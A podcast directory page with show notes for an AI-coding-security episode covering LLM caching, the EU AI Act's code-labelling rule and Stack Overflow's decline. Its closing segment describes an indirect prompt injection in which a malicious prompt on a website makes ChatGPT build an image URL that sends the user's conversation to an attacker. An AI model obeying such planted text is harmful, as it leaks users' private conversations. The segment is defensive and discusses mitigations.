Home
Categories
EXPLORE
True Crime
Comedy
Business
Society & Culture
History
Sports
TV & Film
About Us
Contact Us
Copyright
© 2024 PodJoint
00:00 / 00:00
Sign in

or

Don't have an account?
Sign up
Forgot password
https://is1-ssl.mzstatic.com/image/thumb/Podcasts211/v4/e1/43/a1/e143a140-7348-3128-e262-019cbdd8749d/mza_3453023702255804512.jpg/600x600bb.jpg
Before The Commit
Danny Gershman, Dustin Hilgaertner
18 episodes
6 days ago
AI is writing your code. Who's watching the AI? Before The Commit explores AI coding security, emerging threats, and the trends reshaping software development. Hosts Danny Gershman and Dustin Hilgaertner break down threat models, prompt injection, shadow AI, and practical defenses — drawing from experience across defense, fintech, and enterprise environments. Companion to the book Before The Commit: Securing AI in the Age of Autonomous Code. No hype, just tactical insight for developers, security engineers, and leaders building in the AI era.
Show more...
Technology
RSS
All content for Before The Commit is the property of Danny Gershman, Dustin Hilgaertner and is served directly from their servers with no modification, redirects, or rehosting. The podcast is not affiliated with or endorsed by Podjoint in any way.
AI is writing your code. Who's watching the AI? Before The Commit explores AI coding security, emerging threats, and the trends reshaping software development. Hosts Danny Gershman and Dustin Hilgaertner break down threat models, prompt injection, shadow AI, and practical defenses — drawing from experience across defense, fintech, and enterprise environments. Companion to the book Before The Commit: Securing AI in the Age of Autonomous Code. No hype, just tactical insight for developers, security engineers, and leaders building in the AI era.
Show more...
Technology
https://d3t3ozftmdmh3i.cloudfront.net/staging/podcast_uploaded_nologo/44033863/44033863-1752004425161-c1ba27a4d2e0e.jpg
Episode 8: LLM Caching
Before The Commit
1 hour 17 minutes 40 seconds
3 months ago
Episode 8: LLM Caching

In this episode, the hosts discuss the latest news and trends in AI, focusing on LLM caching, a new EU regulation on AI-generated code, the changing landscape for Stack Overflow, and a recent AI security vulnerability.

The hosts explain LLM caching as a technique to boost efficiency and cut costs for AI providers and developers. It involves saving parts of a prompt that are sent repeatedly, such as tool descriptions for a code agent or a developer's code. This means the content doesn't need to be re-tokenized each time, saving computational power. Providers offer a reduced rate for these cached tokens.

The discussion also highlights proxies like Light LLM, which can cache and reuse responses for multiple users even if their prompts aren't identical. This is achieved through semantic caching, which understands the meaning of words, allowing similar queries to receive the same cached answer.

The hosts express skepticism about the European Union's new AI Act, which mandates that any code "substantially generated or assisted by an AI system" must be clearly identified. This "AI watermarking" aims to increase transparency, but it has open-source platforms debating whether to accept AI-generated code contributions at all due to legal and compliance issues.

One host questions the regulation's practicality, seeing it as a fear-based, "proactive" measure for a problem that hasn't yet been observed. They point out the difficulty of reliably detecting and labeling AI-written code, especially as AI models improve at mimicking human styles. The hosts also note a study showing that AI coding assistants are more likely to introduce security vulnerabilities because they are trained on public code that often contains bugs and outdated security practices.

The podcast covers the decline of Stack Overflow, attributing it to the rise of generative AI tools. Traffic has dropped, and Stack Overflow has responded by partnering with OpenAI to provide its data and adding its own AI features. The hosts believe Stack Overflow's data is a valuable asset that should be monetized rather than scraped.

They conclude that Stack Overflow and similar content websites face a "generational problem." Younger users are less likely to use traditional sites, preferring integrated experiences like chatbots and AI assistants. They compare the future of the internet to a "Netflix algorithm," where AI will guide users directly to the content they need.

In their "Secure or Sus" segment, the hosts discuss a security flaw that allows a threat actor to steal a user's ChatGPT conversation through an "indirect prompt injection." The attacker uploads a malicious prompt to a public website. When a user interacts with it, ChatGPT is tricked into generating an image whose URL secretly contains the user's conversation. The image then sends the conversation to the attacker's server.

The hosts explain that this type of data exfiltration attack can be prevented with defensive measures like an LLM proxy and input/output sanitization. They note that similar vulnerabilities could exist in other AI-driven platforms and conclude that security in the age of AI requires proactive, disciplined measures rather than simply reacting to known vulnerabilities.

Before The Commit
AI is writing your code. Who's watching the AI? Before The Commit explores AI coding security, emerging threats, and the trends reshaping software development. Hosts Danny Gershman and Dustin Hilgaertner break down threat models, prompt injection, shadow AI, and practical defenses — drawing from experience across defense, fintech, and enterprise environments. Companion to the book Before The Commit: Securing AI in the Age of Autonomous Code. No hype, just tactical insight for developers, security engineers, and leaders building in the AI era.